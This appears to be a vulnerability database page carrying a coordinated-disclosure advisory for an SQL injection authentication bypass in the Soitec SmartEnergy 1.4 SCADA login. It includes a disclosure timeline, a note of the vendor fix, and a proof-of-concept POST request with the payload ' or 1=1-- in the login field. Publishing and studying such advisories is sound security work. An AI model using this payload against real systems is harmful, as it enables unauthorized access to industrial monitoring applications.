Soitec SmartEnergy 1.4 SCADA Login SQL Injection Authentication Bypass

Risk: Medium
Local: No
Remote: Yes

Soitec SmartEnergy 1.4 SCADA Login SQL Injection Authentication Bypass Exploit Vendor: Soitec Product web page: Affected version: 1.4 and 1.3 Summary: Soitec power plants are a profitable and ecological investment at the same time. Using Concentrix technology, Soitec offers a reliable, proven, cost-effective and bankable solution for energy generation in the sunniest regions of the world. The application shows how Concentrix technology works on the major powerplants managed by Soitec around the world. You will be able to see for each powerplant instantaneous production, current weather condition, 3 day weather forecast, Powerplant webcam and Production data history. Desc: Soitec SmartEnergy web application suffers from an authentication bypass vulnerability using SQL Injection attack in the login script. The script fails to sanitize the 'login' POST parameter allowing the attacker to bypass the security mechanism and view sensitive information that can be further used in a social engineering attack. Tested on: nginx/1.6.2 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Vendor status: [16.11.2014] Vulnerability discovered. [02.12.2014] Vendor contacted. [08.12.2014] Vendor responds asking more details. [08.12.2014] Sent details to the vendor. [09.12.2014] Vendor confirms the vulnerability. [12.12.2014] Vendor applies fix to version 1.4. [14.12.2014] Coordinated public security advisory released. Advisory ID: ZSL-2014-5216 Advisory URL: 16.11.2014 --- POST /scada/login HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: Cookie: csrftoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY; _ga=GA1.2.658394151.1416124715; sessionid=ixi3w5s72yopc29t9ewrxwq15lzb7v1e Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 87 csrfmiddlewaretoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY&login=%27+or+1%3D1--&password=blah


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top